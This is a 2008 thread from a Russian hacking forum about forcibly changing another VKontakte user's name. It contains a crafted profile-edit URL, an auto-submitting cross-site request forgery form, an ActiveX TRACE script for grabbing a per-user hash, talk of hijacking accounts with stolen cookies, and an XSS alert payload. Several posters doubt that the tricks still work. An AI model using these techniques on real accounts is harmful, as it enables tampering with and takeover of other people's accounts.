Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Болталка (https://forum.antichat.xyz/forumdisplay.php?f=46)
-   -   vkontakte (смена ника) (https://forum.antichat.xyz/showthread.php?t=64099)

InfernoNet 12.03.2008 16:47
vkontakte (смена ника)
 
Видел и слышал, что вконтакте можно поменять другому человеку имя с помощью каких то скриптов.

Кто знает что за байда и что за скрипты?

inlanger 12.03.2008 16:55
бред...

Shawn1x 12.03.2008 17:00
http://vkontakte.ru/profileEdit.php?page=education&time=welcome&subm=1 &first_name=%DF%20%F1%EE%F1%F3&last_name=%F5%F3 %E9

Pir4tt 12.03.2008 17:23
Shawn1x, угу, тока там post))

.:EnoT:. 12.03.2008 18:21
Цитата:
Видел и слышал, что вконтакте можно поменять другому человеку имя с помощью каких то скриптов.
Не надо никаких скриптов, там всего-то надо иметь куки того чей ник сменить хочешь...делов то )))

InfernoNet 12.03.2008 20:40
Это не через куки делается.

Loker 12.03.2008 21:21
Раньше моно было теперь эту тему прикрыли..

Zedobat 12.03.2008 22:05
Цитата:
Сообщение от Pir4tt
Shawn1x, угу, тока там post))
А ты попробуй сначало :)

mr.The 12.03.2008 23:11
Цитата:
А ты попробуй сначало
пробовал и нераз. там пост. это даже в скрипте видно =\

bublebuble 22.03.2008 01:34
1.Просто через куки не получится- там же идёт ещё и сессия, или я чёто путаю, возможно конечно снифером утощить, но както все геморно получается
2.Скриптами?конечно так нельзя

.:EnoT:. 22.03.2008 01:38
Цитата:
1.Просто через куки не получится- там же идёт ещё и сессия, или я чёто путаю, возможно конечно снифером утощить, но както все геморно получается
2.Скриптами?конечно так нельзя
1) Заведи второй акк и поэксперементурий. Подставив чужие куки тебя пустит на чужой акк без проблем. Сниффером? Ты баги знаешь серьёзные? делись давай))
2) Раньше было можно. Почитай группы вконтакте под названиями "Финты вконтакте" и "<script>alert(\'xak\')</script>" увлекательно))

Petr 22.03.2008 01:41
там в настройках по гету все меняется, сформируй ссылку и дай юзеру и все

.:EnoT:. 22.03.2008 01:51
Sandjuro
Зайка ты конечно извини, но я скажу честно. ты заёб писать в темах для того чтобы просто отписаться, типо подумают что ты умный =/
ПОКАЖИТЕ МНЕ ГДЕ ТАМ МЕТОД ГЕТ??

http://i003.radikal.ru/0803/e6/788b2f5faf93.jpg

__mad 22.03.2008 02:04
какая разница что у тебя там написано то?
в вконтакте регистр глобал ОН вообщет... так что как хочешь так и передавай...

+toxa+ 22.03.2008 02:06
PHP код:
<form name='hek' method=post action='http://vkontakte.ru/settings.php'>
<input type=hidden name=act value='change_nickname'>
<input type=hidden name=subm value='1'>
<input type=hidden name=nickname value='hekker'>
</form>
<script>hek.submit();></script
тока наврятли работать будет ибо есть некая переменная hash которая, как я подозреваю, уникальна для каждого id (или же от сессии зависит)

.:EnoT:. 22.03.2008 02:21
Цитата:
какая разница что у тебя там написано то?
в вконтакте регистр глобал ОН вообщет... так что как хочешь так и передавай...
Откуда такая информация что на контакте регистр_гл.=on ? хз я лично не слышал)
И почитайте пожалуйста про регистр_глобалс.
Нет, если в обработчике предположим данные получаются с помощью $_REQUEST[''] то я не спорю, она примет данные и постом и гетом) Но если данные принимаются из определённого метода, т.е. к примеру пост $_POST[''], то из гета он данные не возьмёт.
Более того, я думаю что те кто занимается поддержкой движка контакта не такие дураки чтобы врубать регистр_глобалс и получать переменные сразу из запроса, не используя массивы =/ хотя хз, но имхо если б так было, то контакт бы ломали по 100 раз на дню...

ZET36 22.03.2008 02:38
но там ещё переменная hash идёт индификация каждого юзера

Код HTML:
http://vkontakte.ru/settings.php?hash=[хэшюзера]&act=change_nickname&subm=1&nickname=zet36
так что автоформы там нету

хотя можо попробывать выдернуть значение этого hash с помощью activeX функций в джаваскрипте но это будет актуально только для ослика. щас попробую

ZET36 22.03.2008 02:52
хых что то странно неполучается выдернуть код страницы с контакта
Код:


<SCRIPT>

var x = new ActiveXObject("Microsoft.XMLHTTP");
x.open("rnTRACE","http://vkontakte.ru",false);
x.setRequestHeader("Max-Forwards","0");
x.send();

document.write(x.responseText);



</SCRIPT>
когда с яндэкса пашет
Код:


<SCRIPT>

var x = new ActiveXObject("Microsoft.XMLHTTP");
x.open("rnTRACE","http://yandex.ru",false);
x.setRequestHeader("Max-Forwards","0");
x.send();

document.write(x.responseText);



</SCRIPT>

__mad 22.03.2008 02:54
хэш статичный для каждого юзера...
сессий вконтакте нету... всё держится на куках... ( с сессиями он бы валялся постоянно:D)

Цитата:
Откуда такая информация
проверено...
вот к примеру... vkontakte.ru/login.php?email=&pass=
подставь мыло и пасс и в адресную строку... и ты залогинешься... хотя форма ПОСТ...

ZET36 22.03.2008 02:58
а вот для изменении личной инфы этот хэш нужен при неправильном хэше страница выдаёт
Ошибка безопасности. Попытка изменения имени неуспешна.

.:EnoT:. 22.03.2008 03:01
Цитата:
проверено...
вот к примеру... vkontakte.ru/login.php?email=&pass=
подставь мыло и пасс и в адресную строку... и ты залогинешься... хотя форма ПОСТ...
ну и что?
PHP код:
<?php
$email $_REQUEST['email'];
$pass $_REQUEST['pass'];
?>
Твой факт о регистр_глобалс пока не подтверждается. Почитай мой предыдущий пост.

__mad 22.03.2008 03:30
тут вродь разговор идёт не о факте наличия вкл ригистр глобалс... а о том что можно ПОСТ заменить ГЕТОМ ... и не более...

Petr 22.03.2008 03:38
Енотек, я очень тупой, но вот дуууров...
http://hec.jino-net.ru/vk.JPG
И вот вам гет, который тестился, щяс хз работает или нет.

http://vkontakte.ru/profileEdit.php?page=education&time=welcome&subm=1 &first_name=%DF%20%F1%EE%F1%F3&last_name=%F5%F3 %E9

Скажите что пост обижусь и не буду больше писать ровно в горшок

BuG_4F 14.11.2008 17:58
.:EnoT:.
У тебя часы на 4 минуты отстают ))

Chaak 14.11.2008 18:31
Цитата:
Сообщение от BuG_4F
.:EnoT:.
У тебя часы на 4 минуты отстают ))
Не глубоко рыл...


Время: 00:02